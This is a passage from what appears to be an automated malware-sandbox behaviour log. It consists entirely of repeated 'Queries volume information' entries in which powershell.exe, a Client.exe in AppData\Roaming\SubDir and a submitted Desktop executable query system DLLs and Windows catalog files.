                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\SubDir\Client.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\F4R5fd8grr.exeQueries volume information: C:\Users\user\Desktop\F4R5fd8grr.exe VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
